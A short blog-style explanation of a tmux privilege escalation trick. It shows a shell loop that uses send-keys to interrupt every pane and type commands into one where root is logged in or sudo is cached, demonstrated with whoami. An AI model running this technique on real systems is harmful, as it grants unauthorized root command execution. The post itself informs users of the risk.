tmux privilege escalation abusing send-keys
A script run as user in tmux can under some circumstances execute commands as root.
Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.
There's a tmux feature to send keystrokes to a pane.
tmux send-keys -t $pane 'C-c' for example sends SIGINT to whatever is running in pane $pane.
When I sae the send-keys feature, I was like:
"What if theres another pane, where the user is logged in as root?"
tmux tmux sp su # login as root
Now go back to the other tmux pane (where you are logged in as user).
Now run the following script, to execute
whoami in every pane:
#!/bin/sh for pane in `tmux list-panes | grep -Po '^\d'`; do tmux send-keys -t $pane 'C-c' tmux send-keys -t $pane 'whoami '; done;
You will see, as expected, the command
whoami returned root.
With the same trick you can abuse that
sudo was used in another pane.
tmux send-keys -t $pane 'sudo whoami ';
. . /